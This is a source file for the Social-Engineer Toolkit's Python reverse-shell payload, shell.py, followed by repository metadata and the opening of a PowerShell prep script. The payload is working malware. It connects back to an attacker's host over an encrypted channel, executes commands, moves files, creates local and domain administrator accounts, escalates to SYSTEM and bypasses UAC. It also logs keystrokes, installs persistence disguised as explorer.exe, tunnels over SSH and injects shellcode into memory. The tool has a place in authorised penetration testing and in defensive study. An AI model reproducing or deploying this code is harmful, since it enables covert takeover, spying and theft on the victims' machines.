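    return marker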
# --- File: src/payloads/set_payloads/shell.py ---
#!/usr/bin/env python3
from socket import *
import subprocess
import sys
import os
import base64
import binascii
import threading
import select
import thread
import time
import random
import string
import sys
import logging
import paramiko
import tempfile
import ctypes
# detect if we're on windows
if os.name == "nt":
operating_system = "windows"
import win32process
import win32api
import win32con
import pythoncom
import pyHook
import win32security
from ntsecuritycon import *
# detect if we're on nix
if os.name == "posix":
operating_system = "posix"
##########################################################################
#
# win32process is a third party module, will need to include it, download the windows binaries, be sure to use
# python 2.5, pyinstaller doesn't like anything above it for the byte compiling.
#
# Note to get pyinstaller to work it was compiled under Python 2.5, be sure to install things manually and
# not through Activestate.
#
# Download win32 modules needed for shell here:
# http://sourceforge.net/projects/pywin32/files/pywin32/Build216/pywin32-216.win32-py2.5.exe/download
#
# You will also need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
# to make it easier. Can download from here:
# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
# Will need to download pyHooks from:
# http://sourceforge.net/projects/pyhook/files/pyhook/1.5.1/pyHook-1.5.1.win32-py2.5.exe/download
#
# Be sure to pack it via UPX first in order for the UPX encoding to work properly within SET.
#
##########################################################################
#
#
##########################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
# Remember to use Python 2.5 for Windows, nothing above and don't use ActiveState, things break.
#
##########################################################################
#
#
##########################################################################
#
# For OSX installation, install ActiveState Python 2.7 and type:
#
# sudo pypm install paramiko
#
# You will then need to go into Configure.py in pyinstaller and look for "64bit". Change it to
# something garbage like dsifsdfidsfdshfois. This is a bug if it detects OSX in 64bit it will
# completely bomb. We fix it with the export VERSIONER below but it was still causing issues.
# Changing the 64bit thing will fix it completely.
#
# You will also need to edit Build.py, search for return '64bit' and change to return '32bit'.
# Another bug for detection.
#
# Then create a bash script and run the below from the command line:
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell/shell.spec
#
#
# This will allow you to compile the shell via pyinstaller for OSX
#
# On LINUX it's easy just use pyinstaller ensure paramiko is installed
#
##########################################################################
#
#
##########################################################################
#
# download pyinstaller from: http://www.pyinstaller.org/
#
# Make sure your using python2.5, anything above gets buggy.
#
# Make sure you have win32api, paramiko, pycrypto python modules installed
#
# Ensure to install pyinstaller 1.4, 1.5 is buggy.
#
# Unzip: and run the following commands on the shell.py file
#
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell\shell.spec
#
##########################################################################
verbose = True
# random value here to randomize builds
a = 50 * 5
# try block here
try:
# check for an ip address file if we aren't feeding it
temp = tempfile.gettempdir() # get the path of the temporary directory
if os.path.isfile(temp + "/42logfile42.tmp"):
fileopen = open(temp + "/42logfile42.tmp", "r")
data = fileopen.read()
data = data.split(" ")
ipaddr = data[0]
port = data[1]
try:
os.remove(temp + "/42logfile42.tmp")
except:
pass
# create a socket object
sockobj = socket(AF_INET, SOCK_STREAM)
# parse the textfile
sockobj.connect((ipaddr, int(port)))
if not os.path.isfile(temp + "/42logfile42.tmp"):
# create a socket object
sockobj = socket(AF_INET, SOCK_STREAM)
# parse command line arguments one and two. First is IP, second is port
sockobj.connect((sys.argv[1], int(sys.argv[2])))
# except index error which means user didn't specify IP and port
except IndexError:
# send error message
# if verbose == True:
print("\nThe Social-Engineer Toolkit Basic Shell\n\nSyntax: shell.exe <ipaddress> <port>")
# exit the program
sys.exit()
# except Exception
except Exception as e:
if verbose == True:
print(e)
# sleep 10 seconds and try to connect again
try:
time.sleep(10)
# create a socket object
sockobj = socket(AF_INET, SOCK_STREAM)
# parse command line arguments one and two. First is IP, second is port
sockobj.connect((sys.argv[1], int(sys.argv[2])))
# wait 10 more and try again
time.sleep(10)
# create a socket object
sockobj = socket(AF_INET, SOCK_STREAM)
# parse command line arguments one and two. First is IP, second is port
sockobj.connect((sys.argv[1], int(sys.argv[2])))
# if not give up
except Exception as e:
if verbose == True:
print(e)
sys.exit()
# tell SET we are the interactive shell
# if we're nix
if operating_system == "windows":
send_string = "IHAYYYYYIAMSETANDIAMWINDOWS"
# if we're nix
if operating_system == "posix":
send_string = "IHAYYYYYIAMSETANDIAMPOSIXXX"
sockobj.send(send_string)
# generate random strings
def generate_random_string(low, high):
length = random.randint(low, high)
letters = string.ascii_letters + string.digits
return ''.join([random.choice(letters) for _ in range(length)])
# this is what we use to either encrypt or not encrypt
def send_packet(message, sockobj, encryption, cipher):
# if we encrypt or not
if encryption == 1:
# we encrypt our output here
encoded = EncodeAES(cipher, message)
# we take the length of the encrypted string
normal_size = len(encoded)
# we turn the length of our string into a string literal
normal_size = str(normal_size)
# we encrypt our string literal
normal_size_crypt = EncodeAES(cipher, normal_size)
# we send our encrypted string literal to let our server know how long our
# true encrypted string is
sockobj.sendall(normal_size_crypt)
# we send our encrypted string
time.sleep(0.5)
sockobj.sendall(encoded)
# if 0 then don't encrypt
if encryption == 0:
normal_size = str(len(message))
message = str(message)
sockobj.send(normal_size)
sockobj.send(str(message))
# decrypt packet routine
def decrypt_packet(message, encryption, cipher):
# if we support encryption
if encryption == 1:
return DecodeAES(cipher, message)
# if we don't support encryption
if encryption == 0:
return message
# receive file from the attacker machine
def upload_file(filename):
# define data as the information received from the attacker machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# this will be our encrypted filepath
data = sockobj.recv(1024)
# decrypted file path, not needed here
data = decrypt_packet(data, encryption, cipher)
# specify file to write
filewrite = open(filename, "wb")
# this will be our length for our file
data = sockobj.recv(1024)
# decrypt the length of our file
data = decrypt_packet(data, encryption, cipher)
# here is an ugly hack but it works, basically we set two
# counters. MSGLEN which will eventually equal the length
# of what number was sent to us which represented the length
# of the output of the shell command we executed. Dataout
# will eventually equal the entire string loaded into our
# buffer then sent for decryption.
#
# A loop is started which continues to receive until we hit
# the length of what our entire full encrypted shell output
# is equaled. Once that occurs, we are out of our loop and
# the full string is sent to the decryption routine and
# presented back to us.
MSGLEN = 0
dataout = ""
length = int(data)
while MSGLEN != length:
data = sockobj.recv(1024)
dataout += data
MSGLEN = MSGLEN + len(data)
data = decrypt_packet(dataout, encryption, cipher)
filewrite.write(data)
# close file after write
filewrite.close()
# confirm its there
if os.path.isfile(filename):
send_packet("Confirmed", sockobj, encryption, cipher)
# if its not then send back failed
if not os.path.isfile(filename):
send_packet("Failed", sockobj, encryption, cipher)
# Note that this module does not come with pre-built binaries; you will need either a compiler
# installed on your Windows machine or the pre-built binary blobs from here:
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
from Cryptodome.Cipher import AES
# set encryption key to 1
encryption = 1
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# random value here to randomize builds
a = 50 * 5
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
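# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the payload: a quick round trip through the
# pad/EncodeAES/DecodeAES helpers above, to make the framing easier to follow.
# The key here is generated locally just for the demo; in a real session the
# 32-byte secret arrives from the listener hex-encoded and is unhexlified
# before AES.new() is called. The name _aes_round_trip_demo is invented for
# illustration and is never called (Python 2 style string handling assumed).
# ---------------------------------------------------------------------------
def _aes_round_trip_demo():
    demo_secret = os.urandom(BLOCK_SIZE)
    demo_cipher = AES.new(demo_secret, AES.MODE_ECB)
    original = "ipconfig /all"
    wire_blob = EncodeAES(demo_cipher, original)   # base64 of the ciphertext
    recovered = DecodeAES(demo_cipher, wire_blob)  # plaintext, padding stripped
    return recovered == original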
#############################################
#
# Reboot Server Code through Native
# API.
#
#############################################
def AdjustPrivilege(priv, enable=1):
# Get the process token
flags = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
htoken = win32security.OpenProcessToken(
win32api.GetCurrentProcess(), flags)
# Get the ID for the system shutdown privilege.
idd = win32security.LookupPrivilegeValue(None, priv)
# Now obtain the privilege for this process.
# Create a list of the privileges to be added.
if enable:
newPrivileges = [(idd, SE_PRIVILEGE_ENABLED)]
else:
newPrivileges = [(idd, 0)]
# and make the adjustment
win32security.AdjustTokenPrivileges(htoken, 0, newPrivileges)
def RebootServer(message='Rebooting', timeout=0, bForce=0, bReboot=1):
AdjustPrivilege(SE_SHUTDOWN_NAME)
try:
win32api.InitiateSystemShutdown(
None, message, timeout, bForce, bReboot)
finally:
# Now we remove the privilege we just added.
AdjustPrivilege(SE_SHUTDOWN_NAME, 0)
def AbortReboot():
AdjustPrivilege(SE_SHUTDOWN_NAME)
try:
win32api.AbortSystemShutdown(None)
finally:
AdjustPrivilege(SE_SHUTDOWN_NAME, 0)
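# Illustrative usage of the helpers above (kept commented out so nothing
# executes when this file is loaded); both rely on the pywin32 imports and
# constants defined earlier in this payload:
#   RebootServer(message='Rebooting for maintenance', timeout=30)
#   AbortReboot()   # cancels a pending shutdown within the timeout window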
########################################
#
# Start Paramiko Code here
#
########################################
def handler(chan, host, port):
sock = socket()
try:
sock.connect((host, port))
except Exception as e:
if verbose == True:
print(e)
return
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
sock.send(data)
chan.close()
sock.close()
# here is where we start the transport request for port forward on victim
# then tunnel over via thread and handler
def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):
transport.request_port_forward('', server_port)
# while we accept transport via thread handler continue loop
while True:
chan = transport.accept(1000)
if chan is None:
continue
# define thread
thr = threading.Thread(target=handler, args=(
chan, remote_host, remote_port))
# set thread as daemon
thr.setDaemon(True)
# start thread
thr.start()
########################################
#
# End Paramiko Code here
#
########################################
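# Quick summary of the protocol implemented by the loops below:
#   1. The listener sends a 52-byte blob when encryption is supported (or a
#      51-byte blob when it is not); the payload echoes it back.
#   2. When encryption is on, the listener then sends a hex-encoded key that
#      is unhexlified and used to build an AES ECB cipher object.
#   3. Every message after that is length-prefixed: first an (encrypted)
#      length is received, then that many bytes are read and decrypted.
#   4. The decrypted string selects a handler (shell, localadmin, uploadfile,
#      persistence, and so on) in the dispatch code that follows.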
# main outside loop for the shell
try:
while 1:
# second inside loop
while 1:
# receive socket connection from attacker
data = sockobj.recv(1024)
if data == "quit" or data == "":
sys.exit()
# if the length is 52 then we support encryption
if len(data) == 52:
encryption = 1
sockobj.send(data)
data = sockobj.recv(1024)
data = binascii.unhexlify(data)
secret = data
cipher = AES.new(secret, AES.MODE_ECB)
break
# if the length is 51 then we don't support encryption
if len(data) == 51:
# if we don't support encryption then break out
cipher = ""
sockobj.send(data)
encryption = 0
break
# while true loop forever
while 1:
# define data as a received information from attacker machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# leverage the previous data socket connection as our length for
# our next socket
data = sockobj.recv(int(data))
# this will be our actual data packet
data = decrypt_packet(data, encryption, cipher)
# if data == quit or exit break out of main loop and renegotiate
# encryption
if data == "quit" or data == "exit":
break
# if the attacker specifies a command shell lets get it ready
if data == "shell":
# specify another while loop to put us into the subprocess
# commands
while 1:
# try block
try:
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be
# sent
data = decrypt_packet(data, encryption, cipher)
# leverage the previous data socket connection as our
# length for our next socket
data = sockobj.recv(int(data))
# this will be our actual data packet
data = decrypt_packet(data, encryption, cipher)
# if we receive data 'exit' then break out of the loop
# but keep socket alive
if data == "exit" or data == "quit":
data = ""
# break out of the loop
break
                        # note that you have to do some funky stuff with stdout, stderr, and stdin:
                        # when you use a non-console window, subprocess bugs out (a known issue since
                        # Python 2.5.1). You need to pipe all the channels out to subprocess.PIPE and
                        # then communicate with only stdout via proc.stdout.read(); if not, you will
                        # get a major error when running the shell.
# send our command that would be 'data'
proc = subprocess.Popen(
data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# communicate with stdout and send it back to attacker
stdout_value = proc.stdout.read()
# if we have an error just append to nothing if needed
stdout_value += proc.stderr.read()
# do the actual send
send_packet(str(stdout_value) + "\r\n",
sockobj, encryption, cipher)
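                            # Illustrative alternative (not part of the original flow): the same
                            # result could be obtained with communicate(), which drains stdout and
                            # stderr to completion and avoids pipe deadlocks on very large output:
                            #   stdout_value, stderr_value = proc.communicate()
                            #   send_packet(str(stdout_value + stderr_value) + "\r\n",
                            #               sockobj, encryption, cipher)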
# except a keyboard interrupt shouldn't actually hit this
# since we are using commands from attacker
except KeyboardInterrupt:
# close socket
sockobj.close()
# exit
sys.exit()
# except all other errors
except Exception as e:
if verbose == True:
print(e)
# pass through them
pass
# this section adds a local admin on the local system
if data == "localadmin":
try:
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# leverage the previous data socket connection as our
# length for our next socket
data = sockobj.recv(int(data))
# this will be our actual data packet
data = decrypt_packet(data, encryption, cipher)
                    # split the data sent; fields should be separated by a comma ","
                    # which splits into a list
data = data.split(",")
# this initiates subprocess.Popen as a shell command and
                    # uses net user to add a local user account on the
                    # local machine
proc = subprocess.Popen("net user %s %s /ADD" % (data[0], data[
1]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait()
# this initiates subprocess.Popen as a shell command and
# uses net localgroup to add a local administrator
proc = subprocess.Popen("net localgroup administrators %s /ADD" % (
data[0]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait()
# except exception
except Exception as e:
if verbose == True:
print(e)
pass
# this section adds a domain admin on the local system
if data == "domainadmin":
try:
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# leverage the previous data socket connection as our
# length for our next socket
data = sockobj.recv(int(data))
# this will be our actual data packet
data = decrypt_packet(data, encryption, cipher)
                    # split the data sent; fields should be separated by a comma ","
                    # which splits into a list
data = data.split(",")
# this initiates subprocess.Popen as a shell command and
# uses net user to add a domain user account initially
proc = subprocess.Popen("net user %s %s /ADD /DOMAIN" % (data[0], data[
1]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait()
# this initiates subprocess.Popen as a shell command and
# uses net group to add to domain admins
proc = subprocess.Popen('net group "Domain Admins" %s /ADD /DOMAIN' % (
data[0]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait()
# except errors and don't pass them yet, will add to logging
# later
except Exception as e:
if verbose == True:
print(e)
pass
# this section is if the attacker wants to download a file
if data == "downloadfile":
try:
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# leverage the previous data socket connection as our length for our next socket
# data=sockobj.recv(int(data))
data = sockobj.recv(1024)
# this will be our actual data packet
download = decrypt_packet(data, encryption, cipher)
# if the file isn't there let the listener know
if not os.path.isfile(download):
# send that the file isn't found
send_packet("File not found.", sockobj,
encryption, cipher)
# if the file is there then cycle through it and let the
# listener know
if os.path.isfile(download):
# open the file for read/binary
fileopen = open(download, "rb")
data_file = ""
                    # accumulate the file contents, then send them back
for data in fileopen:
data_file += data
send_packet(data_file, sockobj, encryption, cipher)
# except exception
except Exception as e:
if verbose == True:
print(e)
pass
# this section is if the attacker wants to upload a file
if data == "uploadfile":
# try block
try:
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# this will be our encrypted filepath
data = sockobj.recv(1024)
# decrypted file path
data = decrypt_packet(data, encryption, cipher)
upload_path = data
# specify file to write
filewrite = open(upload_path, "wb")
# this will be our length for our file
data = sockobj.recv(1024)
# decrypt the length of our file
data = decrypt_packet(data, encryption, cipher)
# here is an ugly hack but it works, basically we set two
# counters. MSGLEN which will eventually equal the length
# of what number was sent to us which represented the length
# of the output of the shell command we executed. Dataout
# will eventually equal the entire string loaded into our
# buffer then sent for decryption.
#
# A loop is started which continues to receive until we hit
# the length of what our entire full encrypted shell output
# is equaled. Once that occurs, we are out of our loop and
# the full string is sent to the decryption routine and
# presented back to us.
MSGLEN = 0
dataout = ""
length = int(data)
while MSGLEN != length:
data = sockobj.recv(1024)
dataout += data
MSGLEN = MSGLEN + len(data)
data = decrypt_packet(dataout, encryption, cipher)
filewrite.write(data)
# close file after write
filewrite.close()
                    # confirm it's there
if os.path.isfile(upload_path):
send_packet("Confirmed", sockobj, encryption, cipher)
                    # if it's not there then send back failed
if not os.path.isfile(upload_path):
send_packet("Failed", sockobj, encryption, cipher)
# handle error messages
except Exception as e:
if verbose == True:
print(e)
pass
# here is where we start our paramiko SSH tunneling
if data == "paramiko":
# start initial try block
try:
# send to the server that we support paramiko
send_packet("Paramiko Confirmed.",
sockobj, encryption, cipher)
# receive all of our variables to establish tunnel
data = sockobj.recv(1024)
# decrypt the packet
data = decrypt_packet(data, encryption, cipher)
# receive all
data = sockobj.recv(int(data))
data = decrypt_packet(data, encryption, cipher)
# split into a tuple
data = data.split(",")
# IP of the SSH server
ssh_server_ip = data[0]
# PORT of the SSH server
ssh_server_port_address = data[1]
                # PORT to use on localhost for the tunneled protocol
ssh_server_tunnel_port = data[2]
# username for SSH server
ssh_server_username = data[3]
# password for SSH server
ssh_server_password = data[4]
# PORT to forward from victim
victim_server_port = data[5]
# specify data as ssh_port_tunnel
# main class here
def main(garbage_one, garbage_two, garbage_three):
# our ssh server
server = [ssh_server_ip, int(ssh_server_port_address)]
# what we want to tunnel
remote = ['127.0.0.1', int(victim_server_port)]
password = ssh_server_password # our password
client = paramiko.SSHClient() # use the paramiko SSHClient
client.load_system_host_keys() # load SSH keys
client.set_missing_host_key_policy(
paramiko.AutoAddPolicy()) # automatically add SSH key
try:
client.connect(server[0], server[
1], username=ssh_server_username, key_filename=None, look_for_keys=False, password=password)
# except exception
except Exception as e:
if verbose == True:
print('*** Failed to connect to %s:%d: %r' % (server[0], server[1], e))
try:
reverse_forward_tunnel(ssh_server_tunnel_port, remote[
0], remote[1], client.get_transport())
# except exception
except Exception as e:
if verbose == True:
print(e)
# have to pass some garbage to start thread
garbage_one = ""
garbage_two = ""
garbage_three = ""
# start a new thread to ensure that when we establish an SSH tunnel we can continue
# to leverage SET interactive shell.
# this starts the main routine which is where we get all
# our port forward stuff
thread.start_new_thread(
main, (garbage_one, garbage_two, garbage_three))
# except exception
except Exception as e:
if verbose == True:
print(e)
# lock the workstation of victim
if data == "lockworkstation":
ctypes.windll.user32.LockWorkStation()
# elevate permissions
if data == "getsystem":
try:
temp_path = os.getenv('TEMP')
                # this is our shell executable
set_payload = temp_path + "\\" + \
generate_random_string(10, 15) + ".exe"
# accept the file and write it do disk as the set_payload
# variable
upload_file(set_payload)
# sleep 0.5 seconds
time.sleep(0.5)
                # this will spawn the shell in a separate process thread as
# SYSTEM
def getsystem(set_payload, ipaddr):
# generate a random string between 10 and 15 length
service_name = generate_random_string(10, 15)
# create a service
subprocess.Popen('sc create %s binpath= "cmd /c %s %s" type= own' %
(service_name, set_payload, ipaddr), shell=True).wait()
# start the service, don't wait for it to finish
subprocess.Popen("sc start %s" %
(service_name), shell=True)
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# this will be our ipaddress and port
data = sockobj.recv(1024)
# decrypted file path
data = decrypt_packet(data, encryption, cipher)
# this is our ipaddress and port
ipaddr = data
#
# start a new thread
#
thread.start_new_thread(getsystem, (set_payload, ipaddr))
# handle error messages
except Exception as e:
if verbose == True:
print(e)
pass
# keystroke logging
if data == "keystroke_start":
# TEMP directory
temp_path = os.getenv('TEMP')
# this is the log file
global logfile
logfile = temp_path + "\\" + generate_random_string(10, 15)
# trigger an event
def OnKeyboardEvent(event):
filewrite = open(logfile, "a")
filewrite.write(chr(event.Ascii))
filewrite.close()
return True
# start keystroke logging
def start_keystroke(garbage1, garbage2, garbage3):
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
# need to pass vars to meet threading requirements
garbage1 = ""
garbage2 = ""
garbage3 = ""
# start the keystroke logger
thread.start_new_thread(
start_keystroke, (garbage1, garbage2, garbage3))
# dump keystrokes
if data == "keystroke_dump":
# set a flag to test if we ran keystroke_start first
flag = 0
# try to see if logfile is there
try:
logfile
except:
flag = 1
# if we are all set
if flag == 0:
# open the logfile
if os.path.isfile(logfile):
fileopen = open(logfile, "r")
# read all the data
data = fileopen.read()
# if we found nothing yet
if data == "":
data = "[!] There is no captured keystrokes yet."
if not os.path.isfile(logfile):
data = "[!] There is no captured keystrokes yet."
send_packet(data, sockobj, encryption, cipher)
# if we didn't start the keystroke
if flag == 1:
send_packet(
"[!] It doesn't appear keystroke_start is running, did you execute the command?", sockobj, encryption, cipher)
# bypass windows uac
if data == "bypassuac":
# try block
try:
# TEMP directory
temp_path = os.getenv('TEMP')
# this is our bypass uac executable
bypassuac = temp_path + "\\" + \
generate_random_string(10, 15) + ".exe"
# this is our actual SET payload to be executed with UAC
# safe stuff
set_payload = temp_path + "\\" + \
generate_random_string(10, 15) + ".exe"
                # upload our files; the first is the bypassuac binary
upload_file(bypassuac)
# sleep 0.5 seconds
time.sleep(0.5)
# set payload
upload_file(set_payload)
                # this will spawn the shell in a separate process thread
def launch_uac(bypassuac, set_payload, ipaddress):
subprocess.Popen(
"%s /c %s %s" % (bypassuac, set_payload, ipaddress), shell=True).wait()
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# this will be our ipaddress and port
data = sockobj.recv(1024)
# decrypted file path
data = decrypt_packet(data, encryption, cipher)
# this is our ipaddress and port
ipaddr = data
#
# start a new thread
#
thread.start_new_thread(
launch_uac, (bypassuac, set_payload, ipaddr))
# handle error messages
except Exception as e:
if verbose == True:
print(e)
pass
            # remove persistence for SET
if data == "removepersistence":
# try block
try:
# WINDIR directory
windir_path = os.getenv('WINDIR')
# this is our SET interactive service executable
# set_service = windir_path + "\\system32\\" + generate_random_string(10,15) + ".exe"
set_service = windir_path + "\\system32\\" + "explorer.exe"
subprocess.Popen("%s stop" % (
set_service), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
subprocess.Popen("%s remove" % (
set_service), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# handle error messages
except Exception as e:
if verbose == True:
print(e)
pass
# persistence for SET
if data == "persistence":
# try block
try:
# WINDIR directory
windir_path = os.getenv('WINDIR')
# enumerate home directory
homedir_path = os.getenv("SystemDrive")
homedir_path = homedir_path + "\\Program Files\\Common Files\\"
# see if we are running vista/windows 7 (potential for UAC)
os_counter = 0
# see if its vista or windows 7
if os.path.isdir(homedir_path):
os_counter = 1
set_service = homedir_path + "explorer.exe"
set_shell = homedir_path + \
generate_random_string(10, 15) + ".exe"
# this is our SET interactive service executable
# if its at system32
if os_counter == 0:
if os.path.isdir("%s\\system32" % (windir_path)):
set_service = windir_path + "\\system32\\" + "explorer.exe"
# this is the SET interactive shell
set_shell = windir_path + "\\system32\\" + \
generate_random_string(10, 15) + ".exe"
# upload the persistence set interactive shell
upload_file(set_service)
# sleep 0.5 seconds
time.sleep(0.5)
# upload our SET interactive service
upload_file(set_shell)
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# this will be our ipaddress and port
data = sockobj.recv(1024)
# decrypted file path
data = decrypt_packet(data, encryption, cipher)
# this is our ipaddress and port
ipaddr = data
#ipaddr = set_shell + " " + ipaddr
if os_counter == 0:
filewrite = open("%s\\system32\\isjxwqjs" %
(windir_path), "w")
if os_counter == 1:
filewrite = open("%sisjxwqjs" % (homedir_path), "w")
filewrite.write('"' + set_shell + '"' + " " + ipaddr)
filewrite.close()
time.sleep(2)
# automatically start service
subprocess.Popen('"%s" --startup auto install' % (set_service), shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
time.sleep(5)
# start the service
subprocess.Popen('"%s" start' % (
set_service), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# handle error messages
except Exception as e:
if verbose == True:
print(e)
pass
# if the attacker specifies a command shell lets get it ready
if data == "ps":
try:
# if we're running windows then use win32process to
# enumerate
if operating_system == "windows":
processes = win32process.EnumProcesses()
data = ""
for pid in processes:
try:
handle = win32api.OpenProcess(
win32con.PROCESS_ALL_ACCESS, False, pid)
exe = win32process.GetModuleFileNameEx(
handle, 0)
data += exe + " PID:" + str(pid) + "\r\n"
except:
pass
# if we're running linux then run subprocess ps -aux to
# enumerate
if operating_system == "posix":
# send our command that would be 'data'
proc = subprocess.Popen(
"ps -ax", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# communicate with stdout and send it back to attacker
stdout_value = proc.stdout.read()
# if we have an error just append to nothing if needed
stdout_value += proc.stderr.read()
# send the data back
data = stdout_value
# send our data
send_packet(data, sockobj, encryption, cipher)
except Exception as e:
if verbose == True:
print(e)
# if we want to kill a process
if data == "kill":
try:
# recv initial length of next socket
data = sockobj.recv(1024)
data = decrypt_packet(data, encryption, cipher)
# this should be our pid to kill
data = sockobj.recv(int(data))
pid = decrypt_packet(data, encryption, cipher)
# if we're running windows then use win32api to kill and
# terminate process
if operating_system == "windows":
# specify handler as the process id received
handler = win32api.OpenProcess(
win32con.PROCESS_TERMINATE, 0, int(pid))
# kill the process through the win32api
                    # TerminateProcess function call
win32api.TerminateProcess(handler, 0)
# if we're running linux then run kill -9
if operating_system == "posix":
subprocess.Popen("kill -9 %s" % (pid), shell=True)
data = "Confirmed kill"
# send our data
send_packet(data, sockobj, encryption, cipher)
# except exception
except Exception as e:
if verbose == True:
print(e)
sys.exit()
# this is for rebooting the server
if data == "reboot":
try:
# if we're running windows then use win32process to
# enumerate
if operating_system == "windows":
RebootServer()
data = "[*] Server has been rebooted."
# if we're running linux then run subprocess ps -aux to
# enumerate
if operating_system == "posix":
# send our command that would be 'data'
proc = subprocess.Popen(
"reboot now", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# send the data back
data = "[*] Server has been rebooted."
# send our data
send_packet(data, sockobj, encryption, cipher)
except Exception as e:
if verbose == True:
print(e)
# this section is if the attacker wants to upload a file
if data == "shellcode":
# try block
try:
# define data as a received information from attacker
# machine
data = sockobj.recv(1024)
# decrypt the packet which will tell us length to be sent
data = decrypt_packet(data, encryption, cipher)
# here is an ugly hack but it works, basically we set two
# counters. MSGLEN which will eventually equal the length
# of what number was sent to us which represented the length
# of the output of the shell command we executed. Dataout
# will eventually equal the entire string loaded into our
# buffer then sent for decryption.
#
# A loop is started which continues to receive until we hit
# the length of what our entire full encrypted shell output
# is equaled. Once that occurs, we are out of our loop and
# the full string is sent to the decryption routine and
# presented back to us.
MSGLEN = 0
dataout = ""
length = int(data)
while MSGLEN != length:
data = sockobj.recv(1024)
dataout += data
MSGLEN = MSGLEN + len(data)
data = decrypt_packet(dataout, encryption, cipher)
shellcode = bytearray("%s" % (data))
# awesome shellcode injection code
# http://www.debasish.in/2012/04/execute-shellcode-using-python.html
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(
len(shellcode)),
ctypes.c_int(
0x3000),
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode)))
buf = (ctypes.c_char * len(shellcode)
).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(
ctypes.c_int(ht), ctypes.c_int(-1))
# handle error messages
except Exception as e:
if verbose == True:
print(e)
pass
# keyboard interrupts here
except KeyboardInterrupt:
if verbose == True:
print("[!] KeyboardInterrupt detected. Bombing out of the interactive shell.")
# handle exceptions
except Exception as e:
if verbose == True:
print(e)
sys.exit()
| 49,697 | Python | .py | 1,041 | 31.71854 | 138 | 0.511963 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,827 | prep.py | CHEGEBB_africana-framework/externals/set/src/payloads/powershell/prep.py | #!/usr/bin/env python3
import sys
import subprocess
import re
import os
import time
from src.core.setcore import *
# grab stage encoding flag
stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
# check to see if we are just generating powershell code
